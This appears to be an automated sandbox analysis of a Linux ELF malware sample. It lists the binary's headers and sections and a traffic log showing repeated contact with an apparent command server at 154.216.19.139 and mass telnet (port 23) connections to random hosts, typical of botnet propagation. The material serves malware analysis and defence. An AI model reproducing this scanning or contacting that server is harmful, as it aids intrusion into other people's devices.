                                          File Content Preview:.ELF....................d...4...`u......4. ...(......................f...f...............p.......... ... +..........Q.td............................U..S.......wo...h.....6..[]...$.............U......= ....t..5....$......$.......u........t....h............

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:Intel 80386
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x8048164
                                          Flags:0x0
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:3
                                          Section Header Offset:95584
                                          Section Header Size:40
                                          Number of Section Headers:10
                                          Header String Table Index:9
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x80480940x940x1c0x00x6AX001
                                          .textPROGBITS0x80480b00xb00x136360x00x6AX0016
                                          .finiPROGBITS0x805b6e60x136e60x170x00x6AX001
                                          .rodataPROGBITS0x805b7000x137000x2fdc0x00x2A0032
                                          .ctorsPROGBITS0x805f0000x170000x80x00x3WA004
                                          .dtorsPROGBITS0x805f0080x170080x80x00x3WA004
                                          .dataPROGBITS0x805f0200x170200x5000x00x3WA0032
                                          .bssNOBITS0x805f5200x175200x26000x00x3WA0032
                                          .shstrtabSTRTAB0x00x175200x3e0x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x80480000x80480000x166dc0x166dc6.59900x5R E0x1000.init .text .fini .rodata
                                          LOAD0x170000x805f0000x805f0000x5200x2b205.42990x6RW 0x1000.ctors .dtors .data .bss
                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 5, 2024 08:02:48.947789907 CET38964199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.067641020 CET19938964154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.067703009 CET38964199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.068650007 CET38964199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.069550991 CET38964199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.070794106 CET38966199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.188726902 CET19938964154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.190506935 CET19938966154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.190556049 CET38966199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.191129923 CET38966199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.191497087 CET38966199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.193984032 CET38968199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.231986046 CET19938964154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.310815096 CET19938966154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.313709021 CET19938968154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.313751936 CET38968199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.321796894 CET38968199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.323720932 CET38968199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.338923931 CET38970199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.351953983 CET19938966154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.434050083 CET4433360654.171.230.55192.168.2.23
                                          Dec 5, 2024 08:02:49.434161901 CET33606443192.168.2.2354.171.230.55
                                          Dec 5, 2024 08:02:49.441517115 CET19938968154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.458750963 CET19938970154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.458801985 CET38970199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.462428093 CET38970199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.465533972 CET38970199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.469850063 CET38972199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.484039068 CET19938968154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.553976059 CET4433360654.171.230.55192.168.2.23
                                          Dec 5, 2024 08:02:49.582058907 CET19938970154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.590244055 CET19938972154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.590291977 CET38972199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.591743946 CET38972199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.593305111 CET38972199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.597075939 CET38974199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.628021955 CET19938970154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.747864008 CET19938972154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.747879028 CET19938974154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.747924089 CET38974199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.749459028 CET38974199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.755300999 CET38974199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.758793116 CET38976199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.796884060 CET19938972154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.820239067 CET6002238242192.168.2.2394.156.227.234
                                          Dec 5, 2024 08:02:49.830105066 CET3709623192.168.2.23129.174.103.29
                                          Dec 5, 2024 08:02:49.830115080 CET5754023192.168.2.23200.15.44.155
                                          Dec 5, 2024 08:02:49.830121040 CET4904823192.168.2.23212.129.157.204
                                          Dec 5, 2024 08:02:49.830137014 CET5589623192.168.2.23219.4.115.95
                                          Dec 5, 2024 08:02:49.830153942 CET4031223192.168.2.23145.223.199.144
                                          Dec 5, 2024 08:02:49.830159903 CET4250423192.168.2.2328.135.226.21
                                          Dec 5, 2024 08:02:49.830163002 CET6071423192.168.2.23140.197.190.186
                                          Dec 5, 2024 08:02:49.830166101 CET4612023192.168.2.23210.129.200.221
                                          Dec 5, 2024 08:02:49.830173969 CET3973223192.168.2.2386.95.2.60
                                          Dec 5, 2024 08:02:49.830180883 CET4085623192.168.2.239.133.96.39
                                          Dec 5, 2024 08:02:49.830200911 CET3858223192.168.2.2356.113.94.213
                                          Dec 5, 2024 08:02:49.830214024 CET3606623192.168.2.23151.249.42.76
                                          Dec 5, 2024 08:02:49.830233097 CET4533823192.168.2.23120.157.94.218
                                          Dec 5, 2024 08:02:49.830240965 CET4334023192.168.2.2326.202.86.167
                                          Dec 5, 2024 08:02:49.830264091 CET5564423192.168.2.23222.202.140.133
                                          Dec 5, 2024 08:02:49.830303907 CET4512423192.168.2.2370.162.134.108
                                          Dec 5, 2024 08:02:49.830303907 CET3516623192.168.2.23163.206.140.184
                                          Dec 5, 2024 08:02:49.830305099 CET5554023192.168.2.239.38.169.204
                                          Dec 5, 2024 08:02:49.830305099 CET5907423192.168.2.2356.201.235.136
                                          Dec 5, 2024 08:02:49.830308914 CET4584823192.168.2.2358.65.241.107
                                          Dec 5, 2024 08:02:49.830312014 CET5938023192.168.2.23160.106.164.183
                                          Dec 5, 2024 08:02:49.830328941 CET3624023192.168.2.236.94.1.73
                                          Dec 5, 2024 08:02:49.830341101 CET5141423192.168.2.23177.21.18.87
                                          Dec 5, 2024 08:02:49.830351114 CET5416823192.168.2.23185.29.24.192
                                          Dec 5, 2024 08:02:49.830358028 CET5029623192.168.2.2386.156.177.32
                                          Dec 5, 2024 08:02:49.830368042 CET5520823192.168.2.23114.208.224.169
                                          Dec 5, 2024 08:02:49.830378056 CET5320423192.168.2.23110.60.14.240
                                          Dec 5, 2024 08:02:49.830383062 CET4475223192.168.2.23209.149.251.100
                                          Dec 5, 2024 08:02:49.830403090 CET3428823192.168.2.23108.68.190.123
                                          Dec 5, 2024 08:02:49.830411911 CET3428223192.168.2.23200.96.208.141
                                          Dec 5, 2024 08:02:49.830411911 CET5071423192.168.2.2371.118.23.202
                                          Dec 5, 2024 08:02:49.830454111 CET4923423192.168.2.23212.116.154.204
                                          Dec 5, 2024 08:02:49.830478907 CET5817623192.168.2.23130.214.213.120
                                          Dec 5, 2024 08:02:49.830480099 CET5151423192.168.2.2319.241.51.176
                                          Dec 5, 2024 08:02:49.830480099 CET4740423192.168.2.23182.149.182.79
                                          Dec 5, 2024 08:02:49.830483913 CET3352423192.168.2.2344.154.217.157
                                          Dec 5, 2024 08:02:49.830499887 CET4850023192.168.2.23121.177.189.157
                                          Dec 5, 2024 08:02:49.830511093 CET5731223192.168.2.23175.191.68.88
                                          Dec 5, 2024 08:02:49.830524921 CET4700223192.168.2.23211.218.239.156
                                          Dec 5, 2024 08:02:49.830539942 CET3284223192.168.2.23116.31.85.121
                                          Dec 5, 2024 08:02:49.830549002 CET5251023192.168.2.2312.78.245.231
                                          Dec 5, 2024 08:02:49.830559969 CET5456223192.168.2.23122.208.231.185
                                          Dec 5, 2024 08:02:49.830576897 CET3703223192.168.2.2397.30.217.167
                                          Dec 5, 2024 08:02:49.830578089 CET6012223192.168.2.23139.21.121.102
                                          Dec 5, 2024 08:02:49.830590010 CET4008423192.168.2.23191.79.127.213
                                          Dec 5, 2024 08:02:49.830601931 CET4305623192.168.2.23150.61.48.142
                                          Dec 5, 2024 08:02:49.830601931 CET4259623192.168.2.2339.253.242.12
                                          Dec 5, 2024 08:02:49.830615997 CET4524423192.168.2.23218.43.149.218
                                          Dec 5, 2024 08:02:49.830619097 CET5055623192.168.2.2383.94.159.199
                                          Dec 5, 2024 08:02:49.830631971 CET5058823192.168.2.23116.126.230.31
                                          Dec 5, 2024 08:02:49.830657959 CET5758823192.168.2.2388.241.232.173
                                          Dec 5, 2024 08:02:49.830658913 CET5101423192.168.2.2373.168.122.219
                                          Dec 5, 2024 08:02:49.830672979 CET4251623192.168.2.2349.86.94.59
                                          Dec 5, 2024 08:02:49.830703974 CET5759023192.168.2.2366.111.1.41
                                          Dec 5, 2024 08:02:49.830710888 CET3635423192.168.2.23182.79.105.76
                                          Dec 5, 2024 08:02:49.830713987 CET5789023192.168.2.23138.153.76.148
                                          Dec 5, 2024 08:02:49.830719948 CET4112223192.168.2.2322.51.246.174
                                          Dec 5, 2024 08:02:49.830723047 CET3705823192.168.2.23126.178.131.206
                                          Dec 5, 2024 08:02:49.830733061 CET5840023192.168.2.23135.104.249.188
                                          Dec 5, 2024 08:02:49.830749989 CET5390423192.168.2.2321.160.33.184
                                          Dec 5, 2024 08:02:49.830759048 CET5924823192.168.2.23187.103.242.245
                                          Dec 5, 2024 08:02:49.830771923 CET5435223192.168.2.2388.204.146.7
                                          Dec 5, 2024 08:02:49.830773115 CET4887223192.168.2.23119.20.76.243
                                          Dec 5, 2024 08:02:49.830780983 CET5659423192.168.2.23116.24.104.134
                                          Dec 5, 2024 08:02:49.830790043 CET3708623192.168.2.2358.10.75.114
                                          Dec 5, 2024 08:02:49.830802917 CET4185623192.168.2.23219.235.6.49
                                          Dec 5, 2024 08:02:49.830807924 CET4754023192.168.2.23196.208.109.239
                                          Dec 5, 2024 08:02:49.830826998 CET3956623192.168.2.2386.3.196.5
                                          Dec 5, 2024 08:02:49.830833912 CET4374823192.168.2.2386.188.53.172
                                          Dec 5, 2024 08:02:49.830841064 CET3996823192.168.2.23159.32.231.50
                                          Dec 5, 2024 08:02:49.830847979 CET3566623192.168.2.2341.244.104.33
                                          Dec 5, 2024 08:02:49.830847979 CET3557023192.168.2.23101.75.160.223
                                          Dec 5, 2024 08:02:49.830866098 CET4109223192.168.2.23186.8.160.224
                                          Dec 5, 2024 08:02:49.830873013 CET5171023192.168.2.23157.246.109.62
                                          Dec 5, 2024 08:02:49.830885887 CET4581023192.168.2.2388.11.252.160
                                          Dec 5, 2024 08:02:49.830888033 CET5620023192.168.2.2348.155.61.30
                                          Dec 5, 2024 08:02:49.830902100 CET5979423192.168.2.23219.82.58.82
                                          Dec 5, 2024 08:02:49.830916882 CET3784823192.168.2.2326.127.145.209
                                          Dec 5, 2024 08:02:49.830919981 CET3780023192.168.2.23192.81.84.23
                                          Dec 5, 2024 08:02:49.830926895 CET5825623192.168.2.2364.197.192.50
                                          Dec 5, 2024 08:02:49.830943108 CET4882223192.168.2.23139.157.203.71
                                          Dec 5, 2024 08:02:49.830959082 CET5708823192.168.2.2368.217.38.17
                                          Dec 5, 2024 08:02:49.830980062 CET3978823192.168.2.2353.156.2.56
                                          Dec 5, 2024 08:02:49.830981016 CET5202423192.168.2.2311.126.189.65
                                          Dec 5, 2024 08:02:49.830990076 CET5429623192.168.2.23208.14.132.76
                                          Dec 5, 2024 08:02:49.830993891 CET4012423192.168.2.23154.194.52.21
                                          Dec 5, 2024 08:02:49.831005096 CET4009223192.168.2.2349.144.37.64
                                          Dec 5, 2024 08:02:49.831017017 CET4159223192.168.2.2332.135.216.72
                                          Dec 5, 2024 08:02:49.831032038 CET5245623192.168.2.23215.136.166.39
                                          Dec 5, 2024 08:02:49.831037045 CET3717623192.168.2.2336.163.114.52
                                          Dec 5, 2024 08:02:49.831053972 CET5953023192.168.2.23131.255.253.249
                                          Dec 5, 2024 08:02:49.831053972 CET4612223192.168.2.23189.255.81.119
                                          Dec 5, 2024 08:02:49.831063032 CET5059023192.168.2.2356.140.154.121
                                          Dec 5, 2024 08:02:49.831083059 CET5076223192.168.2.23144.168.24.148
                                          Dec 5, 2024 08:02:49.831084967 CET4801023192.168.2.2336.82.145.157
                                          Dec 5, 2024 08:02:49.831095934 CET3595023192.168.2.23217.250.67.26
                                          Dec 5, 2024 08:02:49.831095934 CET5528023192.168.2.23166.153.125.255
                                          Dec 5, 2024 08:02:49.831120968 CET4768223192.168.2.23121.145.192.109
                                          Dec 5, 2024 08:02:49.831132889 CET4499223192.168.2.2378.79.41.122
                                          Dec 5, 2024 08:02:49.831132889 CET3715823192.168.2.2318.10.246.197
                                          Dec 5, 2024 08:02:49.831155062 CET3621823192.168.2.2337.65.113.12
                                          Dec 5, 2024 08:02:49.831157923 CET3954823192.168.2.2346.250.181.70
                                          Dec 5, 2024 08:02:49.831171989 CET5658823192.168.2.2361.233.196.40
                                          Dec 5, 2024 08:02:49.831175089 CET3987223192.168.2.2327.123.203.123
                                          Dec 5, 2024 08:02:49.831193924 CET4086223192.168.2.23147.201.255.206
                                          Dec 5, 2024 08:02:49.831196070 CET4481223192.168.2.23113.177.123.244
                                          Dec 5, 2024 08:02:49.831207991 CET5740023192.168.2.23138.226.170.110
                                          Dec 5, 2024 08:02:49.831214905 CET4760623192.168.2.2380.205.19.197
                                          Dec 5, 2024 08:02:49.831229925 CET3669823192.168.2.2319.1.248.192
                                          Dec 5, 2024 08:02:49.831243038 CET3954423192.168.2.2354.208.207.93
                                          Dec 5, 2024 08:02:49.831258059 CET5378223192.168.2.23111.15.95.101
                                          Dec 5, 2024 08:02:49.831258059 CET4941823192.168.2.2349.52.200.230
                                          Dec 5, 2024 08:02:49.831270933 CET4032623192.168.2.23193.8.57.105
                                          Dec 5, 2024 08:02:49.831281900 CET5829823192.168.2.23114.232.54.239
                                          Dec 5, 2024 08:02:49.831284046 CET5073823192.168.2.23107.248.86.231
                                          Dec 5, 2024 08:02:49.831296921 CET3546423192.168.2.2329.249.30.124
                                          Dec 5, 2024 08:02:49.831310987 CET5642223192.168.2.23164.237.248.89
                                          Dec 5, 2024 08:02:49.831329107 CET4017423192.168.2.23108.130.142.170
                                          Dec 5, 2024 08:02:49.831335068 CET3817223192.168.2.2392.61.78.162
                                          Dec 5, 2024 08:02:49.831343889 CET4144823192.168.2.23198.5.158.151
                                          Dec 5, 2024 08:02:49.831347942 CET5867223192.168.2.2316.90.195.142
                                          Dec 5, 2024 08:02:49.831357002 CET3404423192.168.2.23105.111.169.139
                                          Dec 5, 2024 08:02:49.831384897 CET5888423192.168.2.2365.241.23.79
                                          Dec 5, 2024 08:02:49.831393003 CET3610023192.168.2.23107.7.192.212
                                          Dec 5, 2024 08:02:49.831410885 CET4229423192.168.2.23164.131.85.26
                                          Dec 5, 2024 08:02:49.831410885 CET5494823192.168.2.2397.99.188.128
                                          Dec 5, 2024 08:02:49.831414938 CET5547023192.168.2.23168.212.74.188
                                          Dec 5, 2024 08:02:49.831432104 CET5500023192.168.2.2346.205.168.229
                                          Dec 5, 2024 08:02:49.831442118 CET4650623192.168.2.2368.117.139.38
                                          Dec 5, 2024 08:02:49.831444979 CET6040423192.168.2.23102.20.168.0
                                          Dec 5, 2024 08:02:49.831465006 CET4076623192.168.2.23149.212.228.32
                                          Dec 5, 2024 08:02:49.831466913 CET5352423192.168.2.23188.164.69.107
                                          Dec 5, 2024 08:02:49.831489086 CET3574023192.168.2.23177.167.178.56
                                          Dec 5, 2024 08:02:49.831489086 CET3891223192.168.2.23159.19.209.164
                                          Dec 5, 2024 08:02:49.831517935 CET4031223192.168.2.2318.64.241.39
                                          Dec 5, 2024 08:02:49.831518888 CET5385223192.168.2.23106.200.173.19
                                          Dec 5, 2024 08:02:49.831530094 CET4814823192.168.2.2329.113.94.55
                                          Dec 5, 2024 08:02:49.831537962 CET3790223192.168.2.23174.88.124.185
                                          Dec 5, 2024 08:02:49.831546068 CET3849623192.168.2.23140.35.152.3
                                          Dec 5, 2024 08:02:49.831558943 CET3500023192.168.2.23163.112.139.45
                                          Dec 5, 2024 08:02:49.831569910 CET5633823192.168.2.2348.48.234.153
                                          Dec 5, 2024 08:02:49.831577063 CET4687223192.168.2.2378.203.215.202
                                          Dec 5, 2024 08:02:49.831577063 CET6042223192.168.2.23128.25.97.132
                                          Dec 5, 2024 08:02:49.831600904 CET3823023192.168.2.2379.101.112.237
                                          Dec 5, 2024 08:02:49.831610918 CET5742223192.168.2.2345.71.25.54
                                          Dec 5, 2024 08:02:49.831612110 CET4482823192.168.2.2326.38.126.244
                                          Dec 5, 2024 08:02:49.831619978 CET5766623192.168.2.23151.114.66.86
                                          Dec 5, 2024 08:02:49.831634045 CET4180423192.168.2.2357.159.205.203
                                          Dec 5, 2024 08:02:49.831640959 CET3501023192.168.2.2376.14.39.41
                                          Dec 5, 2024 08:02:49.831643105 CET6008823192.168.2.235.18.62.230
                                          Dec 5, 2024 08:02:49.831660986 CET5290623192.168.2.2335.110.47.19
                                          Dec 5, 2024 08:02:49.831675053 CET4608223192.168.2.23211.200.199.151
                                          Dec 5, 2024 08:02:49.831691027 CET5854423192.168.2.231.126.222.164
                                          Dec 5, 2024 08:02:49.831701994 CET5239023192.168.2.23172.175.32.64
                                          Dec 5, 2024 08:02:49.831710100 CET4197223192.168.2.23163.146.76.9
                                          Dec 5, 2024 08:02:49.831731081 CET5260823192.168.2.239.237.213.78
                                          Dec 5, 2024 08:02:49.831738949 CET5937423192.168.2.23133.202.32.185
                                          Dec 5, 2024 08:02:49.831741095 CET4674223192.168.2.23216.240.251.4
                                          Dec 5, 2024 08:02:49.831741095 CET4239623192.168.2.23193.84.59.198
                                          Dec 5, 2024 08:02:49.831751108 CET6037623192.168.2.2381.97.1.51
                                          Dec 5, 2024 08:02:49.831759930 CET4198023192.168.2.23130.250.11.206
                                          Dec 5, 2024 08:02:49.831763029 CET4728423192.168.2.2355.48.154.119
                                          Dec 5, 2024 08:02:49.831773043 CET5172623192.168.2.2349.131.105.123
                                          Dec 5, 2024 08:02:49.831775904 CET6062823192.168.2.23143.191.157.249
                                          Dec 5, 2024 08:02:49.831790924 CET5144823192.168.2.23194.145.118.247
                                          Dec 5, 2024 08:02:49.831818104 CET5445423192.168.2.2377.219.167.39
                                          Dec 5, 2024 08:02:49.831818104 CET5818823192.168.2.235.102.186.168
                                          Dec 5, 2024 08:02:49.831819057 CET4932023192.168.2.2347.159.109.247
                                          Dec 5, 2024 08:02:49.831835032 CET5766423192.168.2.2352.160.229.236
                                          Dec 5, 2024 08:02:49.831836939 CET4252423192.168.2.23141.22.216.117
                                          Dec 5, 2024 08:02:49.831847906 CET5213623192.168.2.2393.69.61.87
                                          Dec 5, 2024 08:02:49.831857920 CET5175023192.168.2.2362.163.203.230
                                          Dec 5, 2024 08:02:49.831862926 CET5650823192.168.2.2396.222.218.77
                                          Dec 5, 2024 08:02:49.831883907 CET4943623192.168.2.2368.217.169.32
                                          Dec 5, 2024 08:02:49.831897020 CET5995223192.168.2.23152.47.87.165
                                          Dec 5, 2024 08:02:49.831898928 CET3861223192.168.2.23183.56.68.202
                                          Dec 5, 2024 08:02:49.831902981 CET4724623192.168.2.2311.28.221.113
                                          Dec 5, 2024 08:02:49.831918001 CET4698823192.168.2.2311.186.51.13
                                          Dec 5, 2024 08:02:49.831922054 CET5561023192.168.2.2393.245.89.62
                                          Dec 5, 2024 08:02:49.831939936 CET3679623192.168.2.2359.194.179.68
                                          Dec 5, 2024 08:02:49.831954002 CET6034623192.168.2.23178.158.63.197
                                          Dec 5, 2024 08:02:49.831958055 CET4591823192.168.2.23194.77.207.106
                                          Dec 5, 2024 08:02:49.831965923 CET3322623192.168.2.23199.188.249.152
                                          Dec 5, 2024 08:02:49.831989050 CET5553623192.168.2.23131.217.222.252
                                          Dec 5, 2024 08:02:49.831993103 CET3588023192.168.2.23108.189.48.62
                                          Dec 5, 2024 08:02:49.832003117 CET5002023192.168.2.2314.234.225.230
                                          Dec 5, 2024 08:02:49.832010031 CET4288623192.168.2.2335.200.152.187
                                          Dec 5, 2024 08:02:49.832020044 CET4471823192.168.2.23144.33.193.131
                                          Dec 5, 2024 08:02:49.832020044 CET6061223192.168.2.23158.38.111.112
                                          Dec 5, 2024 08:02:49.832029104 CET4182823192.168.2.2361.210.73.254
                                          Dec 5, 2024 08:02:49.832039118 CET5151223192.168.2.23179.239.7.19
                                          Dec 5, 2024 08:02:49.832041025 CET4675023192.168.2.23111.113.16.140
                                          Dec 5, 2024 08:02:49.832063913 CET4378423192.168.2.2378.107.223.24
                                          Dec 5, 2024 08:02:49.832087994 CET4029823192.168.2.23106.54.203.113
                                          Dec 5, 2024 08:02:49.832087994 CET3810023192.168.2.2370.185.114.58
                                          Dec 5, 2024 08:02:49.832087994 CET5417623192.168.2.23156.60.17.48
                                          Dec 5, 2024 08:02:49.832093954 CET5356023192.168.2.23115.88.21.255
                                          Dec 5, 2024 08:02:49.832113981 CET3720223192.168.2.23106.162.255.130
                                          Dec 5, 2024 08:02:49.832133055 CET4576623192.168.2.2344.232.218.63
                                          Dec 5, 2024 08:02:49.832134008 CET5806823192.168.2.23126.235.65.123
                                          Dec 5, 2024 08:02:49.869110107 CET19938974154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.878530025 CET19938976154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.878585100 CET38976199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.888735056 CET38976199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.898895979 CET38976199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.926604033 CET39380199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:49.939908981 CET19938974154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:49.940036058 CET382426002294.156.227.234192.168.2.23
                                          Dec 5, 2024 08:02:49.940095901 CET6002238242192.168.2.2394.156.227.234
                                          Dec 5, 2024 08:02:49.950280905 CET2337096129.174.103.29192.168.2.23
                                          Dec 5, 2024 08:02:49.950325012 CET3709623192.168.2.23129.174.103.29
                                          Dec 5, 2024 08:02:49.950328112 CET2349048212.129.157.204192.168.2.23
                                          Dec 5, 2024 08:02:49.950340986 CET2357540200.15.44.155192.168.2.23
                                          Dec 5, 2024 08:02:49.950359106 CET4904823192.168.2.23212.129.157.204
                                          Dec 5, 2024 08:02:49.950387955 CET5754023192.168.2.23200.15.44.155
                                          Dec 5, 2024 08:02:49.950402021 CET2355896219.4.115.95192.168.2.23
                                          Dec 5, 2024 08:02:49.950426102 CET2340312145.223.199.144192.168.2.23
                                          Dec 5, 2024 08:02:49.950437069 CET5589623192.168.2.23219.4.115.95
                                          Dec 5, 2024 08:02:49.950443983 CET2360714140.197.190.186192.168.2.23
                                          Dec 5, 2024 08:02:49.950460911 CET4031223192.168.2.23145.223.199.144
                                          Dec 5, 2024 08:02:49.950501919 CET6071423192.168.2.23140.197.190.186
                                          Dec 5, 2024 08:02:49.950536966 CET2346120210.129.200.221192.168.2.23
                                          Dec 5, 2024 08:02:49.950547934 CET234250428.135.226.21192.168.2.23
                                          Dec 5, 2024 08:02:49.950576067 CET4250423192.168.2.2328.135.226.21
                                          Dec 5, 2024 08:02:49.950582027 CET4612023192.168.2.23210.129.200.221
                                          Dec 5, 2024 08:02:49.950582981 CET233973286.95.2.60192.168.2.23
                                          Dec 5, 2024 08:02:49.950620890 CET3973223192.168.2.2386.95.2.60
                                          Dec 5, 2024 08:02:49.950630903 CET23408569.133.96.39192.168.2.23
                                          Dec 5, 2024 08:02:49.950640917 CET233858256.113.94.213192.168.2.23
                                          Dec 5, 2024 08:02:49.950664997 CET4085623192.168.2.239.133.96.39
                                          Dec 5, 2024 08:02:49.950669050 CET3858223192.168.2.2356.113.94.213
                                          Dec 5, 2024 08:02:49.950685978 CET2336066151.249.42.76192.168.2.23
                                          Dec 5, 2024 08:02:49.950721025 CET3606623192.168.2.23151.249.42.76
                                          Dec 5, 2024 08:02:49.950722933 CET2345338120.157.94.218192.168.2.23
                                          Dec 5, 2024 08:02:49.950763941 CET4533823192.168.2.23120.157.94.218
                                          Dec 5, 2024 08:02:49.951328039 CET234334026.202.86.167192.168.2.23
                                          Dec 5, 2024 08:02:49.951363087 CET4334023192.168.2.2326.202.86.167
                                          Dec 5, 2024 08:02:49.951379061 CET2355644222.202.140.133192.168.2.23
                                          Dec 5, 2024 08:02:49.951392889 CET234512470.162.134.108192.168.2.23
                                          Dec 5, 2024 08:02:49.951402903 CET23555409.38.169.204192.168.2.23
                                          Dec 5, 2024 08:02:49.951420069 CET5564423192.168.2.23222.202.140.133
                                          Dec 5, 2024 08:02:49.951426983 CET4512423192.168.2.2370.162.134.108
                                          Dec 5, 2024 08:02:49.951457977 CET5554023192.168.2.239.38.169.204
                                          Dec 5, 2024 08:02:49.951525927 CET235907456.201.235.136192.168.2.23
                                          Dec 5, 2024 08:02:49.951536894 CET234584858.65.241.107192.168.2.23
                                          Dec 5, 2024 08:02:49.951551914 CET2359380160.106.164.183192.168.2.23
                                          Dec 5, 2024 08:02:49.951562881 CET2335166163.206.140.184192.168.2.23
                                          Dec 5, 2024 08:02:49.951565981 CET5907423192.168.2.2356.201.235.136
                                          Dec 5, 2024 08:02:49.951570988 CET4584823192.168.2.2358.65.241.107
                                          Dec 5, 2024 08:02:49.951574087 CET23362406.94.1.73192.168.2.23
                                          Dec 5, 2024 08:02:49.951581955 CET5938023192.168.2.23160.106.164.183
                                          Dec 5, 2024 08:02:49.951585054 CET2351414177.21.18.87192.168.2.23
                                          Dec 5, 2024 08:02:49.951596975 CET2354168185.29.24.192192.168.2.23
                                          Dec 5, 2024 08:02:49.951598883 CET3516623192.168.2.23163.206.140.184
                                          Dec 5, 2024 08:02:49.951608896 CET235029686.156.177.32192.168.2.23
                                          Dec 5, 2024 08:02:49.951620102 CET2355208114.208.224.169192.168.2.23
                                          Dec 5, 2024 08:02:49.951622963 CET3624023192.168.2.236.94.1.73
                                          Dec 5, 2024 08:02:49.951622963 CET5141423192.168.2.23177.21.18.87
                                          Dec 5, 2024 08:02:49.951628923 CET2353204110.60.14.240192.168.2.23
                                          Dec 5, 2024 08:02:49.951637030 CET5416823192.168.2.23185.29.24.192
                                          Dec 5, 2024 08:02:49.951644897 CET5520823192.168.2.23114.208.224.169
                                          Dec 5, 2024 08:02:49.951648951 CET2344752209.149.251.100192.168.2.23
                                          Dec 5, 2024 08:02:49.951662064 CET5320423192.168.2.23110.60.14.240
                                          Dec 5, 2024 08:02:49.951663017 CET5029623192.168.2.2386.156.177.32
                                          Dec 5, 2024 08:02:49.951664925 CET2334288108.68.190.123192.168.2.23
                                          Dec 5, 2024 08:02:49.951675892 CET2334282200.96.208.141192.168.2.23
                                          Dec 5, 2024 08:02:49.951679945 CET4475223192.168.2.23209.149.251.100
                                          Dec 5, 2024 08:02:49.951685905 CET235071471.118.23.202192.168.2.23
                                          Dec 5, 2024 08:02:49.951688051 CET3428823192.168.2.23108.68.190.123
                                          Dec 5, 2024 08:02:49.951697111 CET2349234212.116.154.204192.168.2.23
                                          Dec 5, 2024 08:02:49.951706886 CET2358176130.214.213.120192.168.2.23
                                          Dec 5, 2024 08:02:49.951708078 CET3428223192.168.2.23200.96.208.141
                                          Dec 5, 2024 08:02:49.951708078 CET5071423192.168.2.2371.118.23.202
                                          Dec 5, 2024 08:02:49.951716900 CET235151419.241.51.176192.168.2.23
                                          Dec 5, 2024 08:02:49.951721907 CET4923423192.168.2.23212.116.154.204
                                          Dec 5, 2024 08:02:49.951726913 CET2347404182.149.182.79192.168.2.23
                                          Dec 5, 2024 08:02:49.951757908 CET5817623192.168.2.23130.214.213.120
                                          Dec 5, 2024 08:02:49.951760054 CET5151423192.168.2.2319.241.51.176
                                          Dec 5, 2024 08:02:49.951766968 CET4740423192.168.2.23182.149.182.79
                                          Dec 5, 2024 08:02:49.952148914 CET233352444.154.217.157192.168.2.23
                                          Dec 5, 2024 08:02:49.952167988 CET2348500121.177.189.157192.168.2.23
                                          Dec 5, 2024 08:02:49.952179909 CET2357312175.191.68.88192.168.2.23
